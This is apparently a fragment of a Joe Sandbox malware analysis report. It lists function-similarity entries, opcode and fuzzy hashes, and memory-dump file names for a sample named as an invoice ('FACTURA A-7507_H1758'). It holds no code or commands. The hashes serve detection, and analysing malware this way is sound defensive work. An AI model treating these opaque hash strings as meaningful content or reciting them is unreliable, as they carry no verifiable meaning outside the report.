                                                                                                                                                                                                                          • Instruction ID: ae02a92aa4dc83387f5c2561d702738ba0d8282abe9ae0aaca89e3097183717a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c629f1b1c5e99d3516065729987f42f7f6531b4cb63c6e1480efb82fe4590dfa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B61B3B4B142199BDB1DCE6DC890FAF77BABF84350F508199E812A7394DB32D941C7A0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ed7525d71640319b55b6c00dcff0c5943775fed9389e0ec81df694f1686d9efe
                                                                                                                                                                                                                          • Instruction ID: d562c571458f48ebb6df82469300c61b74e80c4fee7e6c720f298190116eaef1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed7525d71640319b55b6c00dcff0c5943775fed9389e0ec81df694f1686d9efe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58613779A00216EBEB19CF68C880BEE73BAFF44756F504169E851E7280D774D952CB90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4dbc9b8f6ca34978a445ea77d035b2b09001d3566f33c20ef046d4ce11677101
                                                                                                                                                                                                                          • Instruction ID: ef18b6ac1983eb204e9403452c6ee9bfe3be7678119eaedcd6577edd0d455682
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dbc9b8f6ca34978a445ea77d035b2b09001d3566f33c20ef046d4ce11677101
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6719DB1A00609AFDF19CFA4C984EDEBBB8FF48700F104469E545E7251EB70EA45CBA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e94d61b43893621c318cf0da9b5ac6f91ce1b931527a399a19dd309ac815f92f
                                                                                                                                                                                                                          • Instruction ID: 83966fcce7158072606648d52b95b72ca9bf50d0b849fdfce9452811b7366dbf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e94d61b43893621c318cf0da9b5ac6f91ce1b931527a399a19dd309ac815f92f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B515774A09341CFE318CF29C18191ABBE5FF88640F504AAEE5D997365EB70E945CF82
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ec3e569ff0671b3c4acff21e654d9fd703fba3e2fe7196d14d8c4e3cbe50019c
                                                                                                                                                                                                                          • Instruction ID: f2f61a3a9254613c2ded6eec2964b4d39811d540a00e4b9de6e030413d68b165
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec3e569ff0671b3c4acff21e654d9fd703fba3e2fe7196d14d8c4e3cbe50019c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0451BFB22043419BE328DF65DD80F5A77F8EF94764F100A2EF92297291DB34A905CBA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
                                                                                                                                                                                                                          • Instruction ID: da6c2baa820975f7c2017ae83f54331891d5eb8d7bb8d0a63014428ce24a39a2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1051F3BB2043429BDB49DFA48840AAB37F5FFA4684F42486DF941C7250FB34D816C7A2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a475d69be38083aa897544f1681a353b8382c86f435a38cc65cf6ce380572c39
                                                                                                                                                                                                                          • Instruction ID: 47e3708e9ad663938a6c7f8dcadadfddeb1442652c8c69f449b5b4fcf2ddbe77
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a475d69be38083aa897544f1681a353b8382c86f435a38cc65cf6ce380572c39
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA41D0B2640710AFE72D8F29D880B1A77B9FF54B60F11846EE5559B390DF70E881CB90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d9f6d403e40351c5408048de986c78bef38b578b4a33ddad7f547798baea6339
                                                                                                                                                                                                                          • Instruction ID: 00ab8971f5ff2b0800d42008c985f6313914be85c5866351fb38eb3a2099901d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9f6d403e40351c5408048de986c78bef38b578b4a33ddad7f547798baea6339
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E51CD71A04309AFEB29CFA4CC81BDDBBB9FF00350F60046DE5A0A7151EB718959DB11
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ecbc53df088d99e80b1e9ec4badd7d707823ed23e37b2dec3a47a715fc832174
                                                                                                                                                                                                                          • Instruction ID: 7c989643d04ab5d3bfd7712b8a444cdc36691513e81739a4165fe7e53caada6e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecbc53df088d99e80b1e9ec4badd7d707823ed23e37b2dec3a47a715fc832174
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D5117F9A546559FE319CF68C480A9AB7B0FF04B50F8081A5E885DB740EB34E9D2CBC0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 01425cc7034d9e2baccee755d87b47ecf53dab633a55686250d0ead23c97259b
                                                                                                                                                                                                                          • Instruction ID: 7fe1223a3a6cb5cfb349f1063f4eefb5cf3db9bed87f0f49f43731cf4a10b3bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01425cc7034d9e2baccee755d87b47ecf53dab633a55686250d0ead23c97259b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C514E75A06315DFEB1ECBA8C842BDE77B5BB0C794F100459E801F7360DB74A9618B91
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 54d17f16e73df959ade6801bfd14df47c5558d1bd833c14dc3138929320731b6
                                                                                                                                                                                                                          • Instruction ID: c78b065d49bc69d1ec5beda2fc90d0458f7b2bd4167fa7b1b87fb7077077ae23
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54d17f16e73df959ade6801bfd14df47c5558d1bd833c14dc3138929320731b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24514BB5A00615EFCB04CF58C880A9ABBF5FF48754B298699F818DB351D335ED61CB90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b57d30e5e55c2e221fee0ba022ee43d7f6beebf416f9585f90eef619eaee26c0
                                                                                                                                                                                                                          • Instruction ID: 8ecf7ad8224283c69620a10a06461c55f47502bf0d38aef6c2069b2f6fc04a62
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b57d30e5e55c2e221fee0ba022ee43d7f6beebf416f9585f90eef619eaee26c0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA4195B6D0421AABDB1DDBA8C844FEFB7BDAF04654F51006AE914A7301DB35DE0187E0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
                                                                                                                                                                                                                          • Instruction ID: 8706957619b7fa3bb28596d2cb2d3d1e0d622ac16995b5df6a84a25a70542963
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0515CB1640606EFDB05CF94C580E86BBB6FF55304F16C5AAE8089F262E771E985CF90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 72685ca5085e257c7a07f5a63a66d36e4feaccf64bf333f532eb282e0f035f28
                                                                                                                                                                                                                          • Instruction ID: 162b40b067e19fe5563f4d70e5ac3ab2cc357404c369c7d0710464148c44660c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72685ca5085e257c7a07f5a63a66d36e4feaccf64bf333f532eb282e0f035f28
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3051F0753097808FD71DCB18C852F9A77E5BB89B94F4605A8F8118B3A0EB78EC51CB61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4ebca9b2e7bc92aed3dc70043d937d62faadee4d0d48a6fc6e5f2b47e2446cee
                                                                                                                                                                                                                          • Instruction ID: 5899049e2664695025b92db8f7334c08ad9b14c6f1546b3201d7d3ef5d133084
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ebca9b2e7bc92aed3dc70043d937d62faadee4d0d48a6fc6e5f2b47e2446cee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67418AB1640751EFE71ADF66D840B6AB7F8FF00B94F0484A9E5419B290DB71D941CB90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 20dcd10454b14cab9bb7e18e918dd62122663f7e7d7ce61895cadb4788665603
                                                                                                                                                                                                                          • Instruction ID: 2abcc8f00620ea24a0959a8ddf84721a9f770d2fbda19ae7c23a0ba96605fee8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20dcd10454b14cab9bb7e18e918dd62122663f7e7d7ce61895cadb4788665603
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A41B271204740EFD32DDF25D881EAA7BB8FF85760F11066EF92597291CB30A916CB92
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ad424edfe8e79529f681fa3ae27580fe511ad86d63f68dcb329972c4fc4dc83f
                                                                                                                                                                                                                          • Instruction ID: eb9e6d3492b00ca47def9a4cb14f021fd8bbe797fe3b1a355bf74762ba41fd83
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad424edfe8e79529f681fa3ae27580fe511ad86d63f68dcb329972c4fc4dc83f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54414535B04324EFEB0CDE168440BAA73B1FF41794F9180AEDC519B340DABB9D818352
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6166ff69691503678e383fa5de11d7613968ef2fb02bfd1f7970f871216fc124
                                                                                                                                                                                                                          • Instruction ID: 0753278d099822111069ed0646976d4f113501aff1bc2dcf1549a45662009925
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6166ff69691503678e383fa5de11d7613968ef2fb02bfd1f7970f871216fc124
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63411CB4D15388EFDB18CFA9D480AADBBF4BF48704F5041AEE499A7645DB30A905CF60
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a6f8af90836a8fb82f16358b22ea21efaf4fba410f0252b780eb7eab2d8a9fbe
                                                                                                                                                                                                                          • Instruction ID: 5fcc52aa7492f30366d38d83fee68b3056a794d2a9bb1fcc3a825627bc557519
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6f8af90836a8fb82f16358b22ea21efaf4fba410f0252b780eb7eab2d8a9fbe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0641DFB17083019BD319CF6DD880B1BBBE5FBC4750F06456DE8A687381DA76D845C7A1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: dcd6455993274064f6a6227241579ad26cc3a8e0d83799f36078c75410f71ad5
                                                                                                                                                                                                                          • Instruction ID: 020b6451cc682a3de50b801168de551bb4ea2a0d5e75cd5b706839b6ba293247
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dcd6455993274064f6a6227241579ad26cc3a8e0d83799f36078c75410f71ad5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68419CB6A04385DFDB09CF59D480B99B7F1FB58714F1581AAE808AF384CB34A941CF90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0eb84f899f3c950c0af84aafe91c5fede462b894046328ec238219290383c871
                                                                                                                                                                                                                          • Instruction ID: 756d7182fcf00167af872ef327e0499649b4adc024dfbcf689cee16d71f457a1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0eb84f899f3c950c0af84aafe91c5fede462b894046328ec238219290383c871
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77318F76A04328AFDB298B24DC40F9A77B5EF85720F4109DDB85CAB240DB70DE85CB51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f3d86edbb4964f97e3b56b707406b4e7a9272309a859052c9d74130153479d5c
                                                                                                                                                                                                                          • Instruction ID: 22e0acb773d2c5027bdf08fe5e4442c59e4dd5a33def8a9f21c35c6ced57d17d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3d86edbb4964f97e3b56b707406b4e7a9272309a859052c9d74130153479d5c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D3124B1B46686BEE70CDB74C982FD9FBB4BF45204F1441ADC05847211CB74AA6ADFA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                                                                                                                                                          • Instruction ID: 43ba2c3dc86d6c9374dae945125481203bcf201b7c6d98c002c47c009a3030ad
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
